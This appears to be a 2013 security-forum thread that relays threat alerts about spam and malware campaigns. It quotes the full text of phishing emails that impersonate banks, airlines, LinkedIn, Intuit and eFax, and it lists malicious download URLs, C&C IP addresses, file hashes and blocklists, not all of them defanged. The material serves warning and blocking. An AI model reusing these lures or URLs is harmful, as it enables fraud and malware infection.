The DEDE.scr file in the Sales Contract Order.zip attachment has a file size of 221,696 bytes. The MD5 checksum is the following string: 0x79274D0CFAC51906FAF8334952AF2734
The following text is a sample of the e-mail message that is associated with this threat outbreak:
Subject: Re: Out going wire transfer (High Priority)
Message Body:
We have just received instruction to process a wire transfer of $6,780 from your account. Please download/view the attachment for final confirmation and respond as quickly as possible.
Bank Wire Transfer Department.
-Or-
Subject: New Order
Message Body:
Dear Sir,We are currently running out of stock and would need urgent attentionEnclosed please find a new Order. Please send the delivery as quickly
as possible.Meanwhile, please send us the Invoice for endorsement.Best regards Krystyna..."
:fear: :mad:
AplusWebMaster
2013-04-04, 18:23
FYI...
- https://www.net-security.org/malware_news.php?id=2455
4.04.2013 - "Malware activity has become so pervasive that organizations experience a malicious email file attachment or Web link as well as malware communication that evades legacy defenses up to once every three minutes, according to FireEye* ..."
* http://www.fireeye.com/blog/technical/malware-research/2013/04/the-new-fireeye-advanced-threat-report.html
> https://www.net-security.org/images/articles/fireeye-042013-1.jpg
___
Fake "Bill Me Later" SPAM / PP_BillMeLater_Receipe04032013_4283422.zip
- http://blog.dynamoo.com/2013/04/bill-me-later-spam-ppbillmelaterreceipe.html
4 Apr 2013 - "This fake "Bill Me Later" spam comes with a malicious attachment:
Date: Wed, 3 Apr 2013 21:42:52 +0600 [04/03/13 11:42:52 EDT]
From: Bill Me Later [notification @billmelater .com]
Subject: Thank you for scheduling a payment to Bill Me Later
BillMeLater
Log in here
Your Bill Me Later� statement is now available!
Dear Customer,
Thank you for making a payment online! We've received your
Bill Me Later® payment of $1644.03 and have applied it to your account.
For more details please check attached file : PP_BillMeLater_Receipe04032013_4283422.zip
Here are the details:
Your Bill Me Later Account Number Ending in: 0014
You Paid: $1644.03
Your Payment Date*: 04/03/2013
Your Payment Confirmation Number: 228646660603545001
Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.
BillMeLater
*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.
Bill Me Later accounts are issued by WebBank, Salt Lake City Utah
PP10NDPP1
Screenshot: https://lh3.ggpht.com/-55gUxujP5q4/UV1B22tiK2I/AAAAAAAABDs/gW93tK9GcYY/s1600/bill-me-later.png
There is an attachment called PP_BillMeLater_Receipe04032013_4283422.zip which contains an executable file PP_BillMeLater_Receipe_04032013.exe (note that the date is encoded into the filename) which currently has a VirusTotal detection rate of just 26/46*. The executable is resistant to automated analysis tools but has the following fingerprint:
MD5: c93bd092c1e62e9401275289f25b4003
SHA256: ae5af565c75b334535d7d7c1594846305550723c54bf2ae77290784301b2ac29
Blocking EXE-in-ZIP files at your perimeter is an effective way of dealing with this threat, assuming you have the technology to do it."
* https://www.virustotal.com/en/file/ae5af565c75b334535d7d7c1594846305550723c54bf2ae77290784301b2ac29/analysis/1365065866/
File name: PP_BillMeLater_Receipe_04032013.exe
Detection ratio: 26/46
Analysis date: 2013-04-04
___
Fiserv Money Transfer Spam
- http://threattrack.tumblr.com/post/47109985303/fiserv-money-transfer-spam
4 April 2013 - "Subjects seen:
Outgoing Money Transfer
Typical e-mail details:
An outgoing money transfer request has been received by your financial institution. In order to complete the money transfer please print and sign the attached form.
To avoid delays or additional fees please be sure Beneficiary Information including name, branch name, address, city, state, country, and RTN or SWIFT BIC Code is correct. For international Wires be sure you include the International Routing Code (IRC) and International Bank Account Number (IBAN) for countries that require it.
Thank you,
Joy_Farmer
Senior Officer
Cash Management Verification
Phone : [removed]
Email: [removed]
Malicious URLs
3ecompany .com:8080/ponyb/gate.php
23.wellness-health2day .com/ponyb/gate.php
23.ad-specialties .info/ponyb/gate.php
23.advertisingspecialties .biz/ponyb/gate.php
brightpacket .com/coS0GiKE .exe
u16432594.onlinehome-server .com/d8dTEXk.exe
thedryerventdude .com/2FKBSea .exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dd047e7d9b198503a19f6e373bc9ccc6/tumblr_inline_mkqjv0RrN91qz4rgp.png
___
Bank of America Trusteer Spam
- http://threattrack.tumblr.com/post/47107312762/bank-of-america-trusteer-spam
4 April 2013 - "Subjects seen:
New Critical Update
Typical e-mail details:
Valued Customer:
As part of our continued effort to enhance online banking safety, Bank of America announced late last year that it has partnered with Trusteer Rapport to add an additional layer of security to our eBusiness platform and we recommend that all of our online banking customers install the software.
Malicious URLs
23.proautorepairdenver .com/forum/viewtopic.php
23.onqdenver .net/forum/viewtopic.php
23.onqdenver .com/forum/viewtopic.php
3ecompany .com:8080/forum/viewtopic.php
dev2.americanvisionwindows .com/rthsWe.exe
adr2009 .it/R4eFC.exe
easy .com.gr/2YcB2jL.exe
konyapalyaco .net/F6pKX68j.exe
homepage.osewald .de/ynWx1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7ec92f4adb18bd9af21672cf63302558/tumblr_inline_mkqhd7bMm31qz4rgp.png
___
Fake "British Airways" SPAM / igionkialo .ru
- http://blog.dynamoo.com/2013/04/british-airways-spam-igionkialoru.html
4 Apr 2013 - "This fake British Airways spam leads to malware on igionkialo .ru:
Date: Thu, 4 Apr 2013 10:19:48 +0330
From: Marleen Camacho via LinkedIn [member @linkedin .com]
Subject: British Airways E-ticket receipts
Attachments: E-Receipt.htm
e-ticket receipt
Booking reference: UMA7760047
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 69315274. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The attachment E-Receipt.htm leads to a malicious landing page at [donotclick]igionkialo .ru:8080/forum/links/column.php (report here*) hosted on:
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1805773
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.103.45.34
___
Madi/Mahdi/Flashback OS X connected malware spreading through Skype
- http://blog.webroot.com/2013/04/04/madimahdiflashback-os-x-connected-malware-spreading-through-skype/
April 4, 2013 - "Over the past few days, we intercepted a malware campaign that spreads through Skype messages, exclusively coming from malware-infected friends or colleagues. Once users click on the shortened link, they’ll be exposed to a simple file download box, with the cybercriminals behind the campaign directly linking to the malicious executable...
Sample screenshot of the campaign in action:
> https://webrootblog.files.wordpress.com/2013/04/skype_spreading_malware_social_engineering.png
Sample redirection chain: hxxp ://www.goo .gl/aMrTD?image=IMG0540250-JPG -> hxxp ://94.242.198.67/images.php -> MD5: f29b78be1cd29b55db94e286d48cddef * ... Gen:Variant.Symmi.17255.
More malware is known to have been rotated on the same IP... Upon execution, MD5: d848763fc366f3ecb45146279b44f16a phones back to hxxp ://xlotxdxtorwfmvuzfuvtspel .com/RQQgW6RRMZKWdj0xLjImaWQ9MjQ3NzA0MzA5MiZhaWQ9MzAyODcmc2lkPTQmb3M9NS4xLTMyluYwGI8j – 50.62.12.103. What’s so special about this IP (50.62.12.103) anyway? It’s the fact that it’s known to have been used as a C&C for the Madi/Mahdi malware campaign, as well as a C&C for the Flashback MAC OS X malware, proving that someone’s definitely multi-tasking..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/3537d1ab9c006c67f34dbf2eef21d1654eb6589f832e7e91751a9e10442a3b91/analysis/
File name: reznechek.exe
Detection ratio: 27/46
Analysis date: 2013-04-03
___
Legal Case Spam
- http://threattrack.tumblr.com/post/47112985692/legal-case-spam
4 April 2013 - "Re: Our chances to win the case are better than ever.
Typical e-mail details:
We talked to the administration representatives, and if we acknowledge our minor defiance to improve their statistics, the major suit will be closed due to the lack of the government interest to the action. We have executed your explanatory text for the court. Please read it carefully and if anything in it seems unacceptable, let us know.
Speech.doc 332kb
With Best Wishes
Erica Bermudez
Malicious URLs
3ecompany .com:8080/ponyb/gate.php
lanos-info .ru/winadlor.htm
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/633e808be0731f375658f5c3fcea38ce/tumblr_inline_mkqn05HXcK1qz4rgp.png
___
Pennie stock SPAM
- https://isc.sans.edu/diary.html?storyid=15559
Last Updated: 2013-04-05 00:25:54 UTC - "Most of you will remember the pennie stock SPAM messages from a few years ago. The main aim of the game is to buy a bunch of pennie stock and then do a SPAM campaign to drive buying interest, artifically inflating the price of the stock. They sell and make their money. It may be a few cents per share, but if you own enough of it can be quite profitable. Most SPAM filters are more than capable of identifying and dumping this kind of SPAM. It looks however like it is becoming popular again...
News!!!
Date: Thursday, Apr 4th, 2013
Name: Pac West Equities, Inc.
To buy: P_WEI
Current price: $.19
Long Term Target: $.55
OTC News Subscriber Reminder!!! Releases Breaking News This
Morning!
What is old is new again..."
:fear::mad:
AplusWebMaster
2013-04-05, 12:23
FYI...
Fake Legal SPAM / itriopea .ru
- http://blog.dynamoo.com/2013/04/speechdoc-legal-spam-itriopearu.html
5 Apr 2013 - "This fake legal spam leads to malware on itriopea .ru:
Date: Thu, 4 Apr 2013 07:44:02 -0500
From: Malaki Brown via LinkedIn [member @linkedin .com]
Subject: Fwd: Our chances to gain a cause are better than ever.
We conversed with the administration representatives, and if we acknowledge our non-essential contempt for the sake of their statistics increase , the key suit will be closed due to the lack of the state interest to the action. We have executed your elucidative text for the court. Please read it carefully and if anything in it disagrees with you, let us know.
Speech.doc 458kb
With respect to you
Malaki Brown
==============
Date: Thu, 4 Apr 2013 05:37:47 -0600
From: Talisha Sprague via LinkedIn [member @linkedin .com]
Subject: Re: Fwd: Our chances to gain a suit are higher than ever.
We talked to the administration representatives, and if we admit our minor infringements for the sake of their statistics increase , the main cause will be closed due to the lack of the government interest to the proceedings. We have executed your explicatory text for the court. Please read it carefully and if anything in it dissatisfies you, advise us.
Speech.doc 698kb
With Best Regards
Talisha Sprague
The attachment Speech.doc leads to a malicious payload is at [donotclick]itriopea .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Turkey)
Blocklist (including active nameservers):
62.76.40.244
62.76.41.245
91.191.170.26
93.187.200.250
109.70.4.231
188.65.178.27
199.66.224.130
199.191.59.60
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1824890
... Detected suspicious URL pattern... Blackhole 2 Landing Page 93.187.200.250
___
Facebook Photo Share Spam
- http://threattrack.tumblr.com/post/47127129161/facebook-photo-share-spam
5 Apr 2013 - "Subjects Seen:
[removed] shared photo of you.
Typical e-mail details:
[removed] commented on Your photo.
Reply to this email to comment on this photo.
Malicious URLs
barroj .info/images/cnnbrnews.html
craftypidor .info/complaints/arrangement-select.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/071ef811ad841c1a6c155ae7cdb0bf51/tumblr_inline_mkqx97mG4I1qz4rgp.png
___
Fake Invoice SPAM / ijsiokolo .ru
- http://blog.dynamoo.com/2013/04/end-of-aug-statement-spam-ijsiokoloru.html
5 Apr 2013 - "This fake invoice spam leads to malware on ijsiokolo .ru:
Date: Fri, 5 Apr 2013 07:57:37 +0300
From: "Account Services ups" [upsdelivercompanyb @ups .com]
Subject: Re: End of Aug. Statement Required
Attachments: Invoice_AF146989113.htm
Good morning,
I give you inovices issued to you per Feb. (Microsoft Internet Explorer format).
Regards
DAYLE PRIEST
===========
Date: Fri, 5 Apr 2013 07:56:53 -0300
From: "Tracking" [ups-account-services @ups .com]
Subject: Re: FW: End of Aug. Stat.
Hallo,
I give you inovices issued to you per Feb. (Microsoft Internet Explorer format).
Regards
Mariano LEE
The .htm attachment in the email leads to malware at [donotclick]ijsiokolo .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Germany)
Blocklist:
91.191.170.26
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1829725
... Detected suspicious URL pattern... Blackhole 2 Landing Page 208.94.108.238
___
Fake "Copies of Policies" SPAM / ifikangloo .ru
- http://blog.dynamoo.com/2013/04/copies-of-policies-spam-ifikanglooru.html
5 April 2013 - "This spam leads to malware on ifikangloo .ru:
From: KaelSaine @mail .com [mailto:KaelSaine @mail .com]
Sent: 05 April 2013 11:43
Subject: Fwd: LATONYA - Copies of Policies
Unfortunately, I cannot obtain electronic copies of the SPII policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
LATONYA Richmond,
The link in the email leads to a legitimate -hacked- site and then on to [donotclick]ifikangloo .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack**:
91.191.170.26 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Germany)
Blocklist:
91.191.170.26
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1831322
... Detected suspicious URL pattern... Blackhole 2 Landing Page 208.94.108.238
** http://blog.dynamoo.com/2013/04/end-of-aug-statement-spam-ijsiokoloru.html
Variation - same theme: http://threattrack.tumblr.com/post/47198256015/copies-of-policies-spam
5 Apr 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2b9cdfc34cf99aefa37735bb802f518d/tumblr_inline_mksijkLKJT1qz4rgp.png
___
Fake eFax Corpoprate Spam
- http://threattrack.tumblr.com/post/47211038345/efax-corpoprate-spam
5 April 2013 - "Subjects Seen:
Corporate eFax message from Caller ID : “[removed]” - 3 page(s)
Typical e-mail details:
You have received a 3 page(s) fax at 2013-04-05 02:31:33 CST.
* The reference number for this fax is [removed].
View this fax using your PDF reader.
Click here to view this message
Please visit eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Malicious URLs
estherashe .com/winching/index.html
23.frameless-glass-shower-enclosures .com/forum/viewtopic.php
23.frameless-glass-shower-enclosures .com/adobe/update_flash_player.exe
23.garryowen .biz/adobe/
albenden .com/F2SyzQtn.exe
globalinfocomgroup .com/r18Lm7RJ.exe
209.164.63.90 /otQw.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/96ba9a0d3a2efd75fcae8c63881e33a8/tumblr_inline_mkss1ojWsl1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-04-06, 16:41
FYI...
Fake pharmacy SPAM / accooma .org / classic-pharmacy .com
- http://blog.dynamoo.com/2013/04/updated-information-spam-accoomaorg.html
6 April 2013 - "This scary looking spam is nothing more than an attempt to get you to click through to a fake pharmacy site:
Date: Mon, 9 Feb 2004 13:00:35 +0000 (GMT)
From: "Account Info Change" [info @virtualregistrar .com]
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 02/09/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password immediately.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
The link in the email goes to a landing page on accooma .org (184.82.155.18 - HostNOC, US) which clicks through to classic-pharmacy .com (184.82.155.20 - also HostNOC). These two IPs are very close together which indicates a bad block. There does not appear to be any malware involved (see here* and here**) and of course nobody has changed any details on your account. You can safely ignore these emails. A closer examination shows that HostNOC have suballocated 184.82.155.16/29 (184.82.155.16 - 184.82.155.23) to an unknown party... fake pharma sites are active in this range..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1850413
** http://urlquery.net/report.php?id=1850445
- https://www.google.com/safebrowsing/diagnostic?site=AS:21788
"... over the past 90 days, 1069 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-04-06, and the last time suspicious content was found was on 2013-04-06... we found 227 site(s) on this network... that appeared to function as intermediaries for the infection of 981 other site(s)... We found 384 site(s)... that infected 1772 other site(s)..."
___
Fake Facebook pwd reset SPAM / accooma .org
- http://blog.dynamoo.com/2013/04/facebook-reminder-reset-your-password.html
6 April 2013 - "Another very aggressive spam run promoting accooma .org which is a fake pharma site..
Date: Sat, 6 Apr 2013 13:16:59 -0700 [16:16:59 EDT]
From: Facebook
Subject: Reminder: Reset your password
facebook
You recently requested a new password for your Facebook account. It looks like we sent you an email with a link to reset your password 2 ago.
This is a reminder that you need to complete this action by clicking this link and Confirm or Cancel your request.
If you have any other questions, please visit our Help Center.
Thanks,
The Facebook Team
The emails vary somewhat in content. I've received 60+ of these today to one email account alone, so this site is being pushed very hard indeed. Although the email is annoying, it does not seem to be harmful. For more details, see this earlier post* about another spam run for the same domain."
* http://blog.dynamoo.com/2013/04/updated-information-spam-accoomaorg.html
:mad:
AplusWebMaster
2013-04-08, 19:01
FYI...
Fake Bank SPAM / ighjaooru .ru
- http://blog.dynamoo.com/2013/04/m-bank-bankruptcy-spam-ighjaooruru.html
8 Apr 2013 - "I've never heard of M&I Bank but this is quite an old school spam campaign that leads to malware on ighjaooru .ru:
Date: Mon, 8 Apr 2013 -01:41:06 -0800
From: Coral Randolph via LinkedIn [member @linkedin .com]
Subject: Re: Fwd: M&I Bank bankruptcy
Hi, bad news.
M&I Bank bankruptcy
The malicious payload is at [donotclick]ighjaooru .ru:8080/forum/links/column.php (report here*) hosted on a whole load of IPs:
72.167.254.194 (GoDaddy, US)
80.246.62.143 (Alfahosting, Germany)
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
72.167.254.194
80.246.62.143
91.191.170.26
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1885773
... Detected suspicious URL pattern... Blackhole 2 Landing Page 72.167.254.194
___
Fake obit SPAM / ighjaooru .ru
- http://blog.dynamoo.com/2013/04/kissinger-thatchers-strong-beliefs-spam.html
8 April 2013 - "It didn't take long for the Margaret Thatcher themed malware to start after her death. This one leads to malware on ighjaooru .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of Josefa Jimenez via LinkedIn
Sent: 08 April 2013 05:41
Subject: Fwd: Re: Kissinger: Thatcher's strong beliefs
Hi, bad news.
Kissinger: Thatcher's strong beliefs...
The payload and associated domains and IPs are exactly the same as used in this attack*."
* http://blog.dynamoo.com/2013/04/m-bank-bankruptcy-spam-ighjaooruru.html
___
Malicious NASA Asteroid Spam
- http://threattrack.tumblr.com/post/47456625841/malicious-nasa-asteroid-spam
8 April 2013 - "Subjects Seen:
Fwd: NASA plans to catch an asteroid
Typical e-mail details:
Hi, bad news.
NASA plans to catch an asteroid..."
Malicious URLs
worldtennisstars .ru/gakmail.htm
iztakor .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/15ec241d9c739c2f49c9ddedd8e51515/tumblr_inline_mkxwocperr1qz4rgp.png
___
Bad News Spam
- http://threattrack.tumblr.com/post/47461282298/bad-news-spam
8 April 2013 - "Subjects Seen:
Fwd: Re: War with N. Korea
Re: Bank of America bankruptcy
Re: Fwd: Tax havens busted
Re: M&I Bank bankruptcy
Re: Fwd: Shedding light on ‘dark matter’
Typical e-mail details:
Hi, bad news.
<E-mail subject news story>
Malicious URLs
joanred.altervista .org/gakmail.htm
vtoto .ru/gakmail.htm
delta-mebel .by/gakmail.htm
ghostsquad.altervista .org/gakmail.htm
ighjaooru .ru:8080/forum/links/column.php
iztakor .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f655c2a9de1f4e346920fc4127cc9a6a/tumblr_inline_mky16jesX41qz4rgp.png
:fear::mad:
AplusWebMaster
2013-04-09, 17:25
FYI...
Fake HP ScanJet SPAM / jundaio .ru
- http://blog.dynamoo.com/2013/04/hp-scanjet-spam-jundaioru.html
9 Apr 2013 - "This fake printer spam leads to malware on jundaio .ru:
Date: Tue, 9 Apr 2013 10:07:40 +0500 [01:07:40 EDT]
From: Scot Crump [ScotCrump @hotmail .com]
Subject: Re: Scan from a Hewlett-Packard ScanJet #0437
Attachment: HP-ScannedDoc.htm
Attached document was scanned and sent
to you using a HP HPAD-400812P.
SENT BY : Scot S.
PAGES : 9
FILETYPE: .HTM [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment HP-ScannedDoc.htm leads to malware on [donotclick]jundaio .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1894750
... Detected live BlackHole v2.0 exploit kit 91.191.170.26
- http://nakedsecurity.sophos.com/2013/04/04/has-your-hewlett-packard-scanjet-printer-just-tried-to-infect-your-pc-with-malware/
April 4, 2013
___
Fake BoA Bill Payment SPAM / BILL_04092013_Fail.exe
- http://blog.dynamoo.com/2013/04/unable-to-process-your-most-recent-bill.html
9 Apr 2013 - "This spam contains a attachment 04092013.zip which in turn contains a malicious file BILL_04092013_Fail.exe
Date: Tue, 9 Apr 2013 10:44:03 -0500 [11:44:03 EDT]
From: Bank of America [bill.payment @bankofamerica .com]
Subject: Unable to process your most recent Bill Payment
You have a new e-Message from Bank of America
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
Pay To Account Number: **********3454
Due Date: 05/01/2013
Amount Due: $ 508.60
Statement Balance: $ 2,986.26
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause. .
Please do not reply to this message. If you have any questions about the information in this e-Bill , please contact your Bill Pay customer support . For all other questions, call us at 800-887-5749.
Bank of America, N.A. Member FDIC. Equal Housing Lender
Š2013 Bank of America Corporation. All rights reserved...
VirusTotal results are only 11/46*.
MD5: 3cb04da2747769460a7ac09d1be44fc6
SHA256: 141751e9ae18ec55c8cd71e2e464419f3030c21b21e3f0914b0b320adce3bf70
ThreatExpert reports** that the malware attempts to phone home to 64.34.70.31 and 64.34.70.32 (iDigital Internet Inc, Canada) and includes a keylogger."
* https://www.virustotal.com/en/file/141751e9ae18ec55c8cd71e2e464419f3030c21b21e3f0914b0b320adce3bf70/analysis/1365522944/
File name: BILL_04092013_Fail.exe
Detection ratio: 11/46
Analysis date: 2013-04-09
** http://www.threatexpert.com/report.aspx?md5=3cb04da2747769460a7ac09d1be44fc6
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d70d268c60fce31566a75c8a73fe28b0/tumblr_inline_ml0415dYQ91qz4rgp.png
___
Malicious American Airlines Spam
- http://threattrack.tumblr.com/post/47544751293/malicious-american-airlines-spam
April 9, 2013 - "Subjects Seen:
Please download your ticket #[removed]
Typical e-mail details:
Customer Notification
Your bought ticket is attached to the letter as a scan document.
To use your ticket you should Download It .
Malicious URLs
bikemania .org/components/.5wl0rb.php?request=ss00_323
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3ef8e1da24b73673aa9ff90d05d8abdd/tumblr_inline_mkzwnbhOy21qz4rgp.png
___
Fake LinkedIn SPAM / jonahgkio .ru
- http://blog.dynamoo.com/2013/04/linkedin-spam-jonahgkioru.html
9 Apr 2013 - "This fake LinkedIn spam leads to malware on jonahgkio .ru:
Date: Tue, 9 Apr 2013 10:03:31 -0300
From: "service @paypal .com" [service @paypal .com]
Subject: Join my network on LinkedIn
LinkedIn
Marcelene Bruno has indicated you are a Friend
I'd like to add you to my professional network on LinkedIn.
- Marcelene Bruno
Accept
View invitation from Marcelene Bruno
WHY MIGHT CONNECTING WITH Marcelene Bruno BE A GOOD IDEA?
Marcelene Bruno's connections could be useful to you
After accepting Marcelene Bruno's invitation, check Marcelene Bruno's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
© 2012, LinkedIn Corporation
The link leads to a malicious payload on [donotclick]jonahgkio .ru:8080/forum/links/column.php which doesn't seem to be working at the moment. However, it is multihomed on some familiar looking IPs:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ..."
___
Fake Intuit SPAM / juhajuhaa .ru
- http://blog.dynamoo.com/2013/04/intuit-spam-juhajuhaaru.html
9 Apr 2013 - "This fake Intuit spam leads to malware on juhajuhaa .ru:
Date: Tue, 9 Apr 2013 11:21:18 -0430 [11:51:18 EDT]
From: Tagged [Tagged @taggedmail .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Tue, 9 Apr 2013 11:21:18 -0430.
Finances would be gone away from below account # ending in 6780 on Tue, 9 Apr 2013 11:21:18 -0430
amount to be seceded: 4053 USD
Paychecks would be procrastinated to your personnel accounts on: Tue, 9 Apr 2013 11:21:18 -0430
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The link in the email goes through a legitimate but hacked site to a malware landing page at [donotclick]juhajuhaa .ru:8080/forum/links/column.php (report here*) hosted on some familiar-looking IP addresses that we saw earlier:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ...
* http://urlquery.net/report.php?id=1900207
... Detected suspicious URL pattern... Blackhole 2 Landing Page 91.191.170.26
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/07085e6981b95f10a1cb4d56a04d57de/tumblr_inline_ml0a50NPus1qz4rgp.png
___
Top porn sites lead to malware
- http://blog.dynamoo.com/2013/04/top-porn-sites-lead-to-malware.html
9 Apr 2013 - "... the greatest risk comes from external sites such as crakmedia .com (report*), trafficjunky .net (report**) and traffichaus .com (report***) plus several others. These too are intermediaries being abused by third parties.. but this is part of the problem with poorly regulated banner ads and traffic exchangers. Bad things slip into pages easily, and very few people want to kick up a fuss... If you are going to look at the shady side of the web, then it is very important to make sure that your system is fully patched... and a combination of Firefox + NoScript is very good at locking down your browser (note that this isn't really for novices). Logging in as something other than an administrator can also help to reduce the impact of malware.. and of course a good and up-to-date anti-virus or security package is essential."
(More detail at the dynamoo URL above.)
* http://www.google.com/safebrowsing/diagnostic?site=crakmedia.com
** http://www.google.com/safebrowsing/diagnostic?site=trafficjunky.net
*** http://www.google.com/safebrowsing/diagnostic?site=traffichaus.com
___
"Your naked photos online" SPAM ...
- https://www.net-security.org/malware_news.php?id=2460
Apr 9, 2013 - "Malware peddlers continue to use the old "your naked photos online" lure to trick users into following malicious links or downloading malicious attachments, warns Total Defense's* Alex Polischuk. The attached EPS00348.zip file contains an executable of the same name, and sports an icon depicting a natural landscape in order to trick the user into opening it. Unfortunately for those who do, the file is actually a backdoor Trojan that also has the ability to download additional malware onto the compromised computer, allowing the attackers to have total control of it and using it for their own malicious purposes. As always, users are advised -never- to follow links or download files contained in unsolicited emails - no matter the claims they contain and how urgent they sound."
* http://www.totaldefense.com/blogs/2013/04/08/Win32/GysA-Trojan.aspx
:mad:
AplusWebMaster
2013-04-10, 19:08
FYI...
Massive Google scam sent by email to Colombian domains
- https://isc.sans.edu/diary.html?storyid=15586
Last Updated: 2013-04-10 21:01:28 UTC - "... supposedly good news from a resume they sent to google looking for open positions:
> https://isc.sans.edu/diaryimages/images/diary1.png
... The file referenced in the e-mail is zip compressed, MD5 4e85b6c9e9815984087f6722498a6dfc. Once uncompressed, you get document.exe, MD5 3e41ab7c70701452d046b93f764564ec. This file is widely recognized by VirusTotal with a 40/46 detection ratio. It is a mass mailer with backdoor capabilities. The mass mailer malware description can be found at http://home.mcafee.com/virusinfo/virusprofile.aspx?key=153521#none and the backdoor description can be found at http://home.mcafee.com/virusinfo/virusprofile.aspx?key=100938 ... people complained about very slow internet links without performing any download operations. If you were affected by this malware, please keep in mind the following recommendations:
- Do not *ever* open attachments from not reliable sources, specially zipped files that have inside exe files. Nothing good can come from it.
- Do not disable any security controls inside your computer like host IPS, antivirus and personal firewall. If you require to work with software that is blocked by any of these controls and there is no way no enable it through them, it is definitely something you should consider not to use.
